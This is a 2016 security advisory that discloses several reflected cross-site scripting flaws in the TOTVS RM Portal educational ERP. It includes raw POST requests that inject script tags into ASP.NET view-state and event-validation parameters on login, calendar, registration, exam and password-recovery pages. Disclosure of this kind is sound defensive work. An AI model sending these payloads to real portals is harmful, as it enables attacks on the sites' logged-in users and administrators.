TOTVS RM PORTAL Cross Site Scripting
Posted on 17 February 2016
TOTVS RM PORTAL (Educational) - Multiple Cross Site Scripting Vulnerabilities Product web page: www.totvs.com.br Author: vesp3r Email: vesp3r7c3@gmail.com Published: 13/02/2016 [Vendor Product Description] TOTVS (pronounced Totus) is a Brazilian software company, with headquarters in Sao Paulo. TOTVS was initially formed from the merger of Microsiga and Logocenter companies. It is the largest software company in Latin America. TOTVS is the leader in the Brazilian ERP market and according to the FGV, besides Brazil, with offices in Argentina, Mexico and the United States. [Advisory Timeline] 1- 22/Dec/2015 (No vendor response) 2- 05/Feb/2016 (No vendor response) Tested on: 11.40.80.x 11.52.50.x 11.52.63.x 11.52.64.x 11.82.41.1 11.82.37.0 11.82.41.112 11.82.42.1 12.1.6.108 12.1.6.117 12.1.7.100 12.1.7.110 12.1.7.120 12.1.8.0 12.1.8.1 [Vulnerability Details] Attacker could take advantage of reflective XSS by using unprotected __VIEWSTATE and __EVENTVALIDATION parameters, passed to various scripts. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary javascript code in browser in context of the vulnerable website. 1) Reflected Cross-site Scripting - Login.aspx Parameter: __VIEWSTATE POST /corpore.net/Login.aspx HTTP/1.1 [Snip...] Content-Length:599 Expect:100-continue Connection:Keep-Alive __VIEWSTATEGENERATOR=67BA4204&__EVENTARGUMENT=&txtPass=&__VIEWSTATE=%2fwEPDwULLTE4NzE2MDUyNDEPZBYCAgUPZBYCAgMPZBYKAgQPFgIeDUVudGVyRGlzYWJsZWQFBUZhbHNlZAIIDxYCHwAFBUZhbHNlZAIMDxBkDxYBZhYBEAUJQ29ycG9yZVJNBQlDb3Jwb3JlUk1nFgFmZAIQDw9kFgIeD0Rpc2FibGVPblN1Ym1pdAUFZmFsc2VkAhIPD2QWAh4Hb25jbGljawURRm9yZ290UGFzc3dvcmQoKTtkZOnQ03VTJ%2f9xMgjAXrV8uog9rRH%2flHTcm8QGAjB9nwz8a0d92<script>alert(1)<%2fscript>cd412&ddlAlias=CorporeRM&txtUser=&btnLogin=btnLogin%3dAcessar&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdAAVhABOpj5tofEWFrJaBMLLmDFTzKcXJqLg%2bOeJ6QAEa2kPTPkdPWl%2b8YN2NtDCtxie46B0WtOk572tmQWZGjlgiop4oRunf14dz 2) Reflected Cross-site Scripting - EduPSCadastroCandidato.aspx Parameter: __VIEWSTATE POST /Corpore.Net/Source/EduPS-ProcessoSeletivo/Public/EduPSCadastroCandidato.aspx HTTP/1.1 [Snip...] Content-Length:294 Expect:100-continue Connection:Keep-Alive __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=26e09<script>alert(1)<%2fscript>6675c&__VIEWSTATEGENERATOR=2A268E6E&__EVENTVALIDATION=%2FwEdAGthFF%2FXOtK6iDwfhX1K6Jqoyk0VTIKR5mmZ%2BtIHMzMSvhs0Jc5vMLgh%2BScncp5A4h37bPOfETC9GIxfmAuz0Irc0oWQaruiZXPsPoJusmqmY3neRyPHmUYXvOoYPCF%2BNI6bJS0pQ 3) Reflected Cross-site Scripting - calendar.aspx - _ Parameter: __VIEWSTATE POST /Corpore.Net/SharedServices/LibPages/Calendar.aspx HTTP/1.1 [Snip..] Content-Type:application/x-www-form-urlencoded Content-Length:370 Expect:100-continue __VIEWSTATEGENERATOR=CBEC090A&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUKMTY1OTMzMTQ5MmRk0Sm9YhG2VrmP7sr3Vdu25PXWEY00sTB9uOI0E2J%2bDto%3d8f844<script>alert(1)<%2fscript>f1c95&ddYear=1940&ddMonth=1&__LASTFOCUS=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdANEBWDAi1sF9XTMpt%2bPoIvbLLrtqFwodORsBP5MdtMp97Worg0EVYGtniwWRlldVBtgv0s7aRHloaIopjAs%2b7nenbhd3yRDnFv26m%2by5T5c3Rd7F9O8yK3w 6) Reflected Cross-site Scripting - TstMain.aspx Parameter: __VIEWSTATE POST /Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx HTTP/1.1 Referer:http://intra.ubm.br/Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx [Snip..] Content-Length:589 Expect:100-continue Connection:Keep-Alive __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=blFubtHIte6TnItfljNkVuCPdpxrn2d21QVLovI1Oj6c1BjTFGCeNA%2bNH1hljOzffBO%2bE1VjGIfJORklj03DwzHH9gnfklyMHTfrSc6jXT0lmgWQ%2fn09OLOLHFy22L%2f09cQ2cnhIJ8zjXTNBkJOTrizTSX8roB4A2%2f5F0nw%2bHMedUzRwjzgcvas%2bVdOqpdrMgp%2bqwioI9MguZtfxVD7ONhnPDwo%2bUgLB2QraeHh4Fd7DAFy2BsVsCl7an3DaKlx0pMIwi%2f2g%2f8y%2f5VXL1WbXYw%3d%3d63eb9<script>alert(1)<%2fscript>35554&__VIEWSTATEGENERATOR=D041C7D7&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=oIbBDabE%2FPH2SjDjDsk1A4dri3DAV4qax04lAj1I%2B3JimDK%2Bq%2Bl4qrek8MK8H861dVvJHSx56%2BNa5v49Ol5ulZsG3D1QPnf2XgNT1yp2LaTarGQOsUfw60t 5) Reflected Cross Site Scripting - RecoverPassConfirmation.aspx __EVENTVALIDATION Parameter POST /Corpore.Net/SharedServices/LibPages/RecoverPassConfirmation.aspx?UserCaption=5LK%5c9F%5c3D%5c023%5c5B&ConfirmationCaption=%5c7B%5cFAbP%5c06%5c11Q%5c7C&RecoverContainerClassName=ASP.login_aspx%2c+App_Web_jfz24ryx%2c+Version%3d0.0.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3dnull&RecoverInitializeMethodName=GetRecoverPassServer&ServiceAlias=CorporeRM HTTP/1.1 [Snip..] Content-Type: application/x-www-form-urlencoded Content-Length: 458 __EVENTTARGET=btConcluir&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NDcyMzE4MDYPZBYCAgMPZBYEAgQPDxYCHgRUZXh0BQhVc3XDoXJpb2RkAgoPDxYCHwAFBUVtYWlsZGRkb5MeS264FOK9nmP0a1CNQffkay3Ey3ZEBuou6pi65D8%3D&__VIEWSTATEGENERATOR=AF2B313E&__EVENTVALIDATION=%2fwEdAAQGOgL7oK09LZ8PS37yV0yhEtmPWx9iivvmRAEsPWDH1L%2bBuAd%2fYR2jHO%2bKtDPe6m0Cy01bBAlsk2p17oJudhiaquajs%2bXic334N3XfjA0JtMaIEGbBaz%2fyyDVIoKpthJc%3dd8504<script>alert(1)<%2fscript>a2460&TextBoxUser=a%40a.com&TextBoxConfirmation=a%40a.com Thanks to: Ewerson Guimarães (Crash) and Rodrigo Favarini
